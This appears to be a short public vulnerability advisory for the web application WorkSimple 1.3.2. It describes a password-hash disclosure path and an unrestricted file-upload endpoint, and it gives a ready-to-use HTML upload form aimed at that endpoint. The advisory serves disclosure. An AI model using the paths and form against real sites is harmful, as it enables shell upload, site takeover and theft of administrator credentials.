WorkSimple 1.3.2 shell upload and password disclosure

2010.02.25
Credit: JIKO
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[ Multiple Remote Vulnerabilities ] ----------[Script Info] Moi : JIKO Site : No-exploit.Com Email : mm :( Moghla9 Ferme Closed ----------[Script Info] Name : WorkSimple Site:http : http://geekness.eu/ or http://easton.4fd.us/ Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip ----------[exploit Info] 1]~[Password Disclosure Vulnerability] For All Version http://localhost/Path/data/secret.php Name:Md5(Pass) 1]~[Remote File Upload Vulnerability] file :/modules/uploader.php?startupload array(".phps",".txt",".html",".png", ".html", ".htm",".jpg",".png", ".bmp",".c",".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg"); --- <form enctype='multipart/form-data' action='[SITE]/modules/uploader.php?startupload' method='post'> <input type='hidden' name='MAX_FILE_SIZE' value='500000' /> Upload a file: <input name='uploadedfile' size='14' type='file' /> <BR><BR> <input class='button' type='submit' value='upload' /> </form> --- HxH, Cyb3r-DeViL, leopard, ZaIdOoHxHaCkEr, virusman, The Sadhacker, Member No-exploit.Com ________________________________ Faites une bonne action avec Bing Solidaire ! C'est ici !<http://www.bingsolidaire.com>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top